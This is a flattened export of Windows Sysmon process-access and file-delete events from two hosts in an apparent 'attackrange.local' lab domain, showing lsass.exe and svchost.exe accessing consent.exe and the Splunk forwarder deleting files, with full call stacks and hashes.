08:00:37.435{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:37.419{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:37.419{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:37.419{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.319{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.319{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.319{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001052082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.319{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.234{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41FEB34E6829F5BEF2097CD913A83DD5,SHA256=2B61B3ED5D1D2CC8EB4630AC9BD69DFCE5430470A753107B0C2DEE94A215544F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:37.203{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.203{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.203{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809106Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:38.496{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00C4C936763BBA5A67F8E851B94B4797,SHA256=2A76A79B8A836CC378E56B70940E69680EB383EBCD3CEA12159187FA2ED4C02B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:38.600{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=FA325AA7559A6C92DF2E04BCC9134735,SHA256=13C357B5F9150C39D21FB1153F5BC5B5190AD14B31B812DC20A41D05FF50CD30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:38.398{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=745F33FD66B59F97756BC7A8C2BDF4CE,SHA256=12944E762F51C6F53ECDC1B3F34CF853ECE008C8040EB714C7B18F20DA6B7EA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809107Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:39.496{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECC5F4D9A4B848B00BB4AEDAAEE8527F,SHA256=FC6491B1F53056EE750A4D67BFAB86C8B33441F4166DEE199A748EEF497FFF12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:39.401{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A194D3B15DBB04A7DCBF78EA5751B241,SHA256=C28F6532C4DE957601AA130BB30B327EC014D7EB3F2940D15975DADEF13B98E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809109Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:40.511{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8ABA084010C989A149F65DD3ABA9BBE2,SHA256=CE302C3E0F4BC9AF3653131288B138F2914F7DE850918D929F8CEB269E42BF74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:40.417{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=899B1176AFB7A43594EF3B807096710E,SHA256=DC8027D96372C8A560D1892B203FDA99B926EF25F3CC886AC5925D2AA870D78E,IMPHASH=00000000000000000000000000000000falsetrue 